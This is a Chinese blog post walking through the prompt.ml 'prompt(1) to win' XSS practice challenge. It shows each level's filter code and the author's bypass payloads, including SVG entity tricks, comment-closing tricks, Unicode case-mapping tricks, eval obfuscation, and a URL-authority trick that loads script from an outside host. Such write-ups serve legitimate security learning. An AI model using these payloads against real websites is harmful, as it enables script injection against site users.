<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>prompt(1) to win - catcheryp</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="catcheryp"><meta name="msapplication-TileImage" content="/img/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="catcheryp"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="xss 的在线练习，挺不错的，整个在线网站看起来也很可以。"><meta property="og:type" content="blog"><meta property="og:title" content="prompt(1) to win"><meta property="og:url" content="https://blog.catcheryp.cn/2018/09/18/%E5%AE%89%E5%85%A8/Web%E5%AE%89%E5%85%A8/prompt(1)%20to%20win/"><meta property="og:site_name" content="catcheryp"><meta property="og:description" content="xss 的在线练习，挺不错的，整个在线网站看起来也很可以。"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://blog.catcheryp.cn/img/og_image.png"><meta property="article:published_time" content="2018-09-17T16:00:00.000Z"><meta property="article:modified_time" content="2020-11-07T00:48:50.000Z"><meta property="article:author" content="catcheryp"><meta property="article:tag" content="xss"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.catcheryp.cn/2018/09/18/%E5%AE%89%E5%85%A8/Web%E5%AE%89%E5%85%A8/prompt(1)%20to%20win/"},"headline":"catcheryp","image":["https://blog.catcheryp.cn/img/og_image.png"],"datePublished":"2018-09-17T16:00:00.000Z","dateModified":"2020-11-07T00:48:50.000Z","author":{"@type":"Person","name":"catcheryp"},"description":"xss 的在线练习，挺不错的，整个在线网站看起来也很可以。"}</script><link rel="canonical" href="https://blog.catcheryp.cn/2018/09/18/%E5%AE%89%E5%85%A8/Web%E5%AE%89%E5%85%A8/prompt(1)%20to%20win/"><link rel="icon" href="/img/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/monokai.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><meta name="generator" content="Hexo 5.4.0"></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="catcheryp" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/Catcheryp"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal"><i class="fas fa-angle-double-right"></i>prompt(1) to win</h1><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><i class="far fa-calendar-alt"> </i><time dateTime="${date_xml(page.date)}" title="${date_xml(page.date)}">2018-09-18</time></span><span class="level-item is-hidden-mobile"><i class="far fa-calendar-check"> </i><time dateTime="${date_xml(page.updated)}" title="${date_xml(page.updated)}">2020-11-07</time></span><span class="level-item"><i class="far fa-folder-open has-text-grey"></i> <a class="link-muted" href="/categories/%E5%AE%89%E5%85%A8/">安全</a><span> / </span><a class="link-muted" href="/categories/%E5%AE%89%E5%85%A8/Web%E5%AE%89%E5%85%A8/">Web安全</a></span><span class="level-item"><i class="far fa-clock"></i> 10 分钟读完 (大约1482个字)</span></div></div><div class="content"><p>xss 的在线练习，挺不错的，整个在线网站看起来也很可以。</p>
<span id="more"></span>

<p><strong>思考一题多解，以及最优解。</strong></p>
<h3 id="规则"><a href="#规则" class="headerlink" title="规则"></a>规则</h3><p>1、成功执行prompt(1).<br><br>2、payload不需要用户交互（成功会显示you won）<br><br>3、payload必须对下述浏览器有效：<br><br>Chrome(最新版) - Firefox(最新版) - IE10 及以上版本(或者IE10兼容模式)<br><br>4、每个级别至少给出两种浏览器的答案<br><br>5、字符越少越好</p>
<h3 id="Level-0"><a href="#Level-0" class="headerlink" title="Level 0"></a>Level 0</h3><p><strong>payload:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;prompt(1)&lt;&#x2F;script&gt;&lt;&quot;</span><br><span class="line"></span><br><span class="line">&quot;&gt;&lt;noembed&gt;&lt;!--&lt;&#x2F;noembed&gt;&lt;img src&#x3D;1 onerror&#x3D;prompt(1)&gt;--&gt;&lt;&quot;</span><br></pre></td></tr></table></figure>



<h3 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h3><p>这里进行了一点过滤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; Ext.util.Format.stripTags</span><br><span class="line">var stripTagsRE &#x3D; &#x2F;&lt;\&#x2F;?[^&gt;]+&gt;&#x2F;gi;</span><br></pre></td></tr></table></figure>

<p><strong>payload:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload&#x3D;prompt(1) </span><br><span class="line"></span><br><span class="line">&lt;img src&#x3D;&quot;&quot; onerror&#x3D;prompt(1) </span><br></pre></td></tr></table></figure>

<p>后面要有一个空格<br>因为 html 会进行自动闭合</p>
<p>关于 <code>&lt;svg&gt;</code>参考<a target="_blank" rel="noopener" href="https://www.cnblogs.com/hupeng/archive/2012/12/21/2828456.html">这篇</a></p>
<h3 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;                      v-- frowny face</span><br><span class="line">input &#x3D; input.replace(&#x2F;[&#x3D;(]&#x2F;g, &#39;&#39;);</span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg&gt;&lt;script&gt;prompt&amp;#40;1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p>由源代码可知，这里过滤了<code>=(</code>，所以这里我们只要使用<code>(</code>的字符实体就行了，但是千万要注意这里前面需要加<code>&lt;svg&gt;</code>,因为只有这样才能保证<code>&amp;#40;</code>可以被提前解析成 <code>(</code> 然后与 <code>&lt;script&gt;&lt;/script&gt;</code>结合，构成可执行的代码。</p>
<blockquote>
<p>这里的svg不能去掉，由于xml编码特性。在SVG向量里面的script元素（或者其他CDATA元素 ），会先进行xml解析。因此&amp;#x28（十六进制）或者&amp;#40（十进制）或者&amp;lpar；（html实体编码）会被还原成（。</p>
</blockquote>
<h3 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h3><p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--!&gt;&lt;script&gt;prompt(1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p>源码中显示到 <code>-&gt;</code> 被过滤，但是这题需要先闭合注释框，2012年后，html标签可以用 <code>--!&gt;</code>闭合.</p>
<h3 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="regexp">/^(?:https?:)?\/\/prompt\.ml\//i</span>.test(<span class="built_in">decodeURIComponent</span>(input))) &#123;</span><br><span class="line">        <span class="keyword">var</span> script = <span class="built_in">document</span>.createElement(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">        script.src = input;</span><br><span class="line">        <span class="keyword">return</span> script.outerHTML;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这题需要绕过限制访问其他域里的 <code>js</code> 文件，<code>decodeURIComponent()</code> 这个函数可对<code>encodeURIComponent()</code> 函数编码的 URI 进行解码，这里可以使用形如 <code>http://prompt.ml%2f@attacker.com</code> 的链接骗过浏览器，比如 <code>http://baidu.com%2f@pwdme.cc/</code> 就可以访问 <code>pwdme.cc</code>，再用 <code>encodeURIComponent()</code> 编码后的 <code>/</code> 拼接在链接中就可以执行代码，最终的payload为 <code>//prompt.ml%2f@pwdme.cc/1.js</code></p>
<p>这里我的payload是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;prompt.ml%2f@47.104.137.146&#x2F;level4.js</span><br></pre></td></tr></table></figure>
<p>直接将上述地址复制到浏览器的地址栏会得到js代码，但还是不行，我们来看看参考答案的解释</p>
<blockquote>
<p>While the first part of the solution for this level is easy to find, using protocol relative URLs and incomplete HTTP Basic Authentication, <strong>the Unicode trick was the hard part.</strong> As can be seen, the ways how browsers treat Unicode in URLs and especially domains is quirky and offers a large playground for attacks and obfuscation.</p>
</blockquote>
<p>来自：<a target="_blank" rel="noopener" href="https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-1">prompt.ml</a></p>
<p><strong>还是没有明白我这里到底哪里不行</strong>，按道理说我是绕过了的，但是就是没有回显<code>Win</code>.</p>
<p>参考：<br><br><a target="_blank" rel="noopener" href="http://pwdme.cc/2016/12/06/prompt-ml-xss/">http://pwdme.cc/2016/12/06/prompt-ml-xss/</a><br><br><a target="_blank" rel="noopener" href="https://hellohxk.com/blog/prompt-1-writeup/">https://hellohxk.com/blog/prompt-1-writeup/</a></p>
<h3 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">input</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// apply strict filter rules of level 0</span></span><br><span class="line">    <span class="comment">// filter &quot;&gt;&quot; and event handlers</span></span><br><span class="line">    input = input.replace(<span class="regexp">/&gt;|on.+?=|focus/gi</span>, <span class="string">&#x27;_&#x27;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&lt;input value=&quot;&#x27;</span> + input + <span class="string">&#x27;&quot; type=&quot;text&quot;&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>1、首先是过滤，把onxxxx=这样的替换为_,这里用一个回车绕过。<br>2、其次是第二点，就是后面的type不可以覆盖前面的，所以可以把type=image。</p>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;type&#x3D;image src onerror</span><br><span class="line">&#x3D;prompt(1) &quot;</span><br></pre></td></tr></table></figure>



<h3 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">input</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// let&#x27;s do a post redirection</span></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="comment">// pass in formURL#formDataJSON</span></span><br><span class="line">        <span class="comment">// e.g. http://httpbin.org/post#&#123;&quot;name&quot;:&quot;Matt&quot;&#125;</span></span><br><span class="line">        <span class="keyword">var</span> segments = input.split(<span class="string">&#x27;#&#x27;</span>);</span><br><span class="line">        <span class="keyword">var</span> formURL = segments[<span class="number">0</span>];</span><br><span class="line">        <span class="keyword">var</span> formData = <span class="built_in">JSON</span>.parse(segments[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">var</span> form = <span class="built_in">document</span>.createElement(<span class="string">&#x27;form&#x27;</span>);</span><br><span class="line">        form.action = formURL;</span><br><span class="line">        form.method = <span class="string">&#x27;post&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">var</span> i <span class="keyword">in</span> formData) &#123;</span><br><span class="line">            <span class="keyword">var</span> input = form.appendChild(<span class="built_in">document</span>.createElement(<span class="string">&#x27;input&#x27;</span>));</span><br><span class="line">            input.name = i;</span><br><span class="line">            input.setAttribute(<span class="string">&#x27;value&#x27;</span>, formData[i]);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> form.outerHTML + <span class="string">&#x27;                         \n\</span></span><br><span class="line"><span class="string">&lt;script&gt;                                                  \n\</span></span><br><span class="line"><span class="string">    // forbid javascript: or vbscript: and data: stuff    \n\</span></span><br><span class="line"><span class="string">    if (!/script:|data:/i.test(document.forms[0].action)) \n\</span></span><br><span class="line"><span class="string">        document.forms[0].submit();                       \n\</span></span><br><span class="line"><span class="string">    else                                                  \n\</span></span><br><span class="line"><span class="string">        document.write(&quot;Action forbidden.&quot;)               \n\</span></span><br><span class="line"><span class="string">&lt;/script&gt;                                                 \n\</span></span><br><span class="line"><span class="string">        &#x27;</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Invalid form data.&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;        </span><br></pre></td></tr></table></figure>

<p>首先看题目给的例子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;httpbin.org&#x2F;post#&#123;&quot;name&quot;:&quot;Matt&quot;&#125;</span><br><span class="line"></span><br><span class="line">HTML source:</span><br><span class="line">&lt;form action&#x3D;&quot;http:&#x2F;&#x2F;httpbin.org&#x2F;post&quot; method&#x3D;&quot;post&quot;&gt;&lt;input name&#x3D;&quot;name&quot; value&#x3D;&quot;Matt&quot;&gt;&lt;&#x2F;form&gt;</span><br></pre></td></tr></table></figure>



<p>*<em>由于存在子级tag, action 将会优先指向name为action的子tag. *</em></p>
<p>例子:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action&#x3D;&quot;javascript:prompt(1)&quot; method&#x3D;&quot;post&quot;&gt;&lt;&#x2F;input&gt;&lt;&#x2F;form&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">    alert(document.forms[0].action);      </span><br><span class="line">&lt;&#x2F;script&gt;  </span><br></pre></td></tr></table></figure>

<p>正常弹出 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:prompt(1)</span><br></pre></td></tr></table></figure>



<p>下面我们修改下，加上一个 input 标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action&#x3D;&quot;javascript:prompt(1)&quot; method&#x3D;&quot;post&quot;&gt;&lt;input name&#x3D;&quot;action&quot; value&#x3D;1&gt;&lt;&#x2F;input&gt;&lt;&#x2F;form&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">    alert(document.forms[0].action);      </span><br><span class="line">&lt;&#x2F;script&gt; </span><br></pre></td></tr></table></figure>

<p>弹出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[object HTMLInputElement]</span><br></pre></td></tr></table></figure>

<p>可以看到返回内容被覆盖了</p>
<p>通过上面的例子，我们构造相应的 <strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:prompt(1)#&#123;&quot;action&quot;:1&#125;</span><br></pre></td></tr></table></figure>



<h3 id="Level-7"><a href="#Level-7" class="headerlink" title="Level 7"></a>Level 7</h3><p><strong>主要的思路就是利用 js 注释符绕过</strong></p>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;&#x2F;*#*&#x2F;prompt(&#x2F;*#*&#x2F;1)&#x2F;*#*&#x2F;&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line">HTML source:</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;&quot;&gt;&lt;script&gt;&#x2F;*&quot;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;*&#x2F;prompt(&#x2F;*&quot;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;*&#x2F;1)&#x2F;*&quot;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;*&#x2F;&lt;&#x2F;script&gt;&quot;&gt;&lt;&#x2F;p&gt;</span><br></pre></td></tr></table></figure>



<p><strong>SVG文件中可以通过任意元素的onload事件执行Javascript,且不需要用户交互</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;svg a&#x3D;#&quot;onload&#x3D;&#39;&#x2F;*#*&#x2F;prompt(1)&#39;</span><br><span class="line"></span><br><span class="line">HTML source:</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;&quot;&gt;&lt;svg a&#x3D;&quot;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;&quot;onload&#x3D;&#39;&#x2F;*&quot;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;*&#x2F;prompt(1)&#39;&quot;&gt;&lt;&#x2F;p&gt;</span><br></pre></td></tr></table></figure>



<h3 id="Level-8"><a href="#Level-8" class="headerlink" title="Level 8"></a>Level 8</h3><ul>
<li>是U+2028，是Unicode中的行分隔符。</li>
<li>是U+2029，是Unicode中的段落分隔符。<br>而且–&gt;在js中可以当注释使用</li>
</ul>
<p>我们要构造的答案是这样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">&#x2F;&#x2F; console.log(&quot;</span><br><span class="line">prompt(1)</span><br><span class="line">--&gt;&quot;);</span><br><span class="line">&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#39;\u2028prompt(1)\u2028--&gt;&#39;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>按照上面的直接作为输入的话不能直接绕过，要将 <code>\u2028</code> 转换成可见的乱码字符才能绕过。</p>
<p>这里不知道为什么直接在 console 中无法转换。</p>
<p>真正的payload是下面这个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"> prompt(1) --&gt;</span><br></pre></td></tr></table></figure>



<h3 id="Level-9"><a href="#Level-9" class="headerlink" title="Level 9"></a>Level 9</h3><p>简单的正则过滤，由&lt;(开始的后面加任意字母的时候，中间都加一个_。</p>
<p>这里无法注入html的标签，但是toUppercase支持unicode字符，字符<code>ſ</code>经过函数toUpperCase()处理后，会变成ASCII码字符”S”。</p>
<p>js对大小写敏感，所以代码的引入需要通过外部环境。</p>
<p>所以这道题的payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;ſcript&#x2F;ſrc&#x3D;&#x2F;&#x2F;⒕₨&gt;&lt;&#x2F;ſcript&gt;</span><br></pre></td></tr></table></figure>

<p><code>src</code>外部链接的引入需要用到 Level4 的 tricks。</p>
<h3 id="Level-A"><a href="#Level-A" class="headerlink" title="Level A"></a>Level A</h3><p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p&#39;rompt(1)</span><br></pre></td></tr></table></figure>



<h3 id="Level-B-⭐️"><a href="#Level-B-⭐️" class="headerlink" title="Level B ⭐️"></a>Level B ⭐️</h3><p>利用类型判断操作符进行js代码的执行。</p>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;(prompt(1))instanceof&quot;</span><br><span class="line">&quot;(prompt(1))in&quot;</span><br></pre></td></tr></table></figure>



<h3 id="Level-C-⭐️"><a href="#Level-C-⭐️" class="headerlink" title="Level C ⭐️"></a>Level C ⭐️</h3><p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">parseInt(&quot;prompt&quot;,36); &#x2F;&#x2F;1558153217</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">(1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))</span><br><span class="line">执行上述代码的回显结果是: prompt(1)</span><br><span class="line"></span><br><span class="line">eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))</span><br><span class="line">eval() 函数黑魔法</span><br><span class="line"></span><br><span class="line">下面这几种解法也可以</span><br><span class="line">eval((1558153217).toString(36))(1)</span><br><span class="line">eval(1558153217..toString(36))(1)</span><br><span class="line">eval(630038579..toString(30))(1)</span><br><span class="line"> </span><br><span class="line">&#x2F;&#x2F; Hexadecimal alternative (630038579 &#x3D;&#x3D; 0x258da033):</span><br><span class="line">eval(0x258da033.toString(30))(1)</span><br><span class="line"></span><br><span class="line">for((i)in(self))eval(i)(1)</span><br><span class="line">&#x2F;&#x2F;遍历 self 里面的函数，但是不知道为啥我这里没有执行成功</span><br></pre></td></tr></table></figure>



<h3 id="Level-D-⭐️"><a href="#Level-D-⭐️" class="headerlink" title="Level D ⭐️"></a>Level D ⭐️</h3><h3 id="Level-E-⭐️"><a href="#Level-E-⭐️" class="headerlink" title="Level E  ⭐️"></a>Level E  ⭐️</h3><h3 id="Level-F"><a href="#Level-F" class="headerlink" title="Level F"></a>Level F</h3><p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;svg&gt;&lt;!--#--&gt;&lt;script&gt;&lt;!--#--&gt;prompt(1&lt;!--#--&gt;)&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line">HTML source</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;&quot;&gt;&lt;svg&gt;&lt;!--&quot; data-comment&#x3D;&#39;&#123;&quot;id&quot;:0&#125;&#39;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;--&gt;&lt;script&gt;&lt;!--&quot; data-comment&#x3D;&#39;&#123;&quot;id&quot;:1&#125;&#39;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;--&gt;prompt(1&lt;!--&quot; data-comment&#x3D;&#39;&#123;&quot;id&quot;:2&#125;&#39;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;p class&#x3D;&quot;comment&quot; title&#x3D;&quot;--&gt;)&lt;&#x2F;script&gt;&quot; data-comment&#x3D;&#39;&#123;&quot;id&quot;:3&#125;&#39;&gt;&lt;&#x2F;p&gt;</span><br></pre></td></tr></table></figure>




<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a target="_blank" rel="noopener" href="https://lorexxar.cn/2015/07/02/xss-p/">https://lorexxar.cn/2015/07/02/xss-p/</a><br><br><a target="_blank" rel="noopener" href="https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml">https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml</a><br><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_35078631/article/details/77073233">https://blog.csdn.net/qq_35078631/article/details/77073233</a><br><br><a target="_blank" rel="noopener" href="http://1person.me/deepXssPrompt1/">http://1person.me/deepXssPrompt1/</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>prompt(1) to win</p><p><a href="https://blog.catcheryp.cn/2018/09/18/安全/Web安全/prompt(1) to win/">https://blog.catcheryp.cn/2018/09/18/安全/Web安全/prompt(1) to win/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>catcheryp</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2018-09-18</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2020-11-07</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><hr style="height:1px;margin:1rem 0"><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/xss/">xss </a></div></div><div class="sharethis-inline-share-buttons"></div><script src="https://platform-api.sharethis.com/js/sharethis.js#property=603680113b3a4b00152e3928&amp;product=inline-share-buttons" defer></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2018/09/19/%E5%AE%89%E5%85%A8/Web%E5%AE%89%E5%85%A8/CBC%E5%AD%97%E8%8A%82%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CBC字节翻转攻击</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" 